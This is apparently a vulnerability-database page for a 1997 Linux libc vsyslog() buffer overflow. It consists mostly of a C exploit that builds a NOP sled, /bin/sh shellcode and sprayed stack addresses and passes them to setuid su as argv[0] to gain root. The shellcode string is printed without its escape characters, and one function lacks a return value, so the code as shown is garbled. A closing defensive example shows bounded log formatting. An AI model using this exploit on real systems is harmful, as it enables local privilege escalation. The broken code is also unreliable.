Linux libc 5.3.12/5.4 (RedHat Linux 4.0) – ‘vsyslog()’ Local Buffer Overflow

Vulnerability ID: 1053359
Vulnerability type:
Published: 1997-12-21
Updated: 1997-12-21
CVE ID: N/A
CNNVD-ID: N/A
Platform: Linux
CVSS score: N/A
|Vulnerability source
https://www.exploit-db.com/exploits/19360
|Vulnerability details
Vulnerability details have not yet been disclosed
|Exploit
source: http://www.securityfocus.com/bid/475/info

Linux libc 5.4.32 and below contain a buffer overflow that allows a user to obtain local root access under some conditions. The overflow is in the function vsyslog() and is exploitable through the setuid-root program su, which passes an argument that exceeds the buffer's boundaries directly to the function. Exploited this way, the flaw allows a user to execute arbitrary code and gain root access.

/*
vsyslog()/openlog() exploit by BiT - 8/8 1997
Greets to: doodle, skaut, melon, kweiheri etc.
*/

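#include <stdlib.h>
#include <string.h>   /* memset(), strlen() */
#include <unistd.h>

/* Returns the current stack pointer; the value is left in %eax. */
unsigned long get_esp(void)
{
    __asm__("movl %esp, %eax");
}

void main(int argc, char **argv)
{
    unsigned char shell[] =
    "xebx24x5ex8dx1ex89x5ex0bx33xd2x89x56x07x89x56x0f"
    "xb8x1bx56x34x12x35x10x56x34x12x8dx4ex0bx8bxd1xcd"
    "x80x33xc0x40xcdx80xe8xd7xffxffxff_bin_sh";
    char *buf, *p;
    unsigned long *adr;
    int i;

    if ((p = buf = malloc(2028 + 28)) == NULL)
        exit(-1);
    /* Fill the first 2028 bytes with 0x90 (NOP). */
    memset(p, 0x90, 2028);
    /* Place the payload at the end of that 2028-byte region. */
    p += 2028 - strlen(shell);
    for (i = 0; i < strlen(shell); i++)
        *p++ = shell[i];
    /* Follow the payload with seven copies of the stack address. */
    adr = (long *)p;
    for (i = 0; i < 7; i++)
        *adr++ = get_esp();
    p = (char *)adr;
    *p = 0;
    /* The whole buffer is handed to su as argv[0]. */
    execl("/bin/su", buf, NULL);
}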
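The defensive counterpart to the overflow described above, as an added example that is not code from the original page or from libc: a simplified model of formatting a log line into a fixed buffer, with the unbounded pattern beside a bounded one that truncates and reports it. The function names, LOG_BUF and TAG_MAX are assumptions made for illustration; the oversized program name is constructed to resemble the argv[0] the exploit hands to su.

```c
#include <stdarg.h>
#include <stdio.h>
#include <string.h>
#define LOG_BUF 2048  /* assumed buffer size, illustration only */
#define TAG_MAX 64    /* assumed cap on the program-name tag */

/* Unbounded pattern for contrast, never called here: no length limit on tag or message. */
int format_unbounded(char *out, const char *tag, const char *fmt, va_list ap)
{
    int n = sprintf(out, "%s: ", tag);
    return n + vsprintf(out + n, fmt, ap);
}

/* Bounded version: returns bytes stored (without the NUL) and sets
 * *truncated when the tag or the message did not fit. */
size_t format_bounded(char *out, size_t cap, int *truncated,
                      const char *tag, const char *fmt, ...)
{
    va_list ap;
    size_t used;
    int n;
    *truncated = strlen(tag) > TAG_MAX;
    if (cap == 0) return 0;
    n = snprintf(out, cap, "%.*s: ", TAG_MAX, tag);   /* tag is length-capped */
    if (n < 0) { out[0] = '\0'; return 0; }
    if ((size_t)n >= cap) { *truncated = 1; return cap - 1; }
    used = (size_t)n;
    va_start(ap, fmt);
    n = vsnprintf(out + used, cap - used, fmt, ap);   /* bounded by space left */
    va_end(ap);
    if (n < 0) { out[used] = '\0'; return used; }
    if ((size_t)n >= cap - used) { *truncated = 1; return cap - 1; }
    return used + (size_t)n;
}

/* Constructed input: a 4095-byte program name, oversized like the exploit's argv[0]. */
size_t demo_oversized_tag(int *truncated)
{
    char tag[4096] = {0}, out[LOG_BUF];
    memset(tag, 'A', sizeof tag - 1);
    return format_bounded(out, sizeof out, truncated, tag, "%s", "bad password");
}

int main(void)
{
    int t;
    size_t n = demo_oversized_tag(&t);
    return printf("%lu bytes stored, truncated=%d\n", (unsigned long)n, t) < 0;
}
```

The truncation flag gives the caller something to act on: a setuid program can log or reject an abnormally long program name instead of silently formatting it.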
